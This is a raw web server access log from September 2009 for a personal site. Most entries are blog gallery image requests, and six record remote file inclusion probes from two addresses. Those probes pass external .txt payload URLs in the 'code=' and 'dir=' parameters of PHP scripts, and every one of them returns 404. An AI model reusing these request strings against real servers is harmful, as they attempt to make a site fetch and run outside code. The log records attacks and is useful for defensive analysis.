58.184.252.3 - - [07/Sep/2009:10:44:27 -0700] "GET /logs/modifyform.html?code=http://www.partyplans.com.au/forum2/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.184.252.3 - - [07/Sep/2009:10:44:27 -0700] "GET /logs/access_071226.log/modifyform.html?code=http://www.partyplans.com.au/forum2/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
24.126.231.121 - - [07/Sep/2009:10:44:29 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/048.jpg HTTP/1.1" 200 551887 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2" "dmulk.com"
58.184.252.3 - - [07/Sep/2009:10:44:30 -0700] "GET /modifyform.html?code=http://www.partyplans.com.au/forum2/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
24.126.231.121 - - [07/Sep/2009:10:44:39 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-111_0.jpg HTTP/1.1" 200 455376 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2" "dmulk.com"
24.126.231.121 - - [07/Sep/2009:10:44:43 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/021.jpg HTTP/1.1" 200 442796 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2" "dmulk.com"
211.234.122.171 - - [07/Sep/2009:10:44:50 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://kpu.feelmuziq.com/comm/attach/tukulid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
211.234.122.171 - - [07/Sep/2009:10:44:50 -0700] "GET /logs/access_090418.log//skin/zero_vote/ask_password.php?dir=http://kpu.feelmuziq.com/comm/attach/tukulid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
211.234.122.171 - - [07/Sep/2009:10:44:50 -0700] "GET /skin/zero_vote/ask_password.php?dir=http://kpu.feelmuziq.com/comm/attach/tukulid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
24.126.231.121 - - [07/Sep/2009:10:44:54 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-092.jpg HTTP/1.1" 200 437098 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2" "dmulk.com"
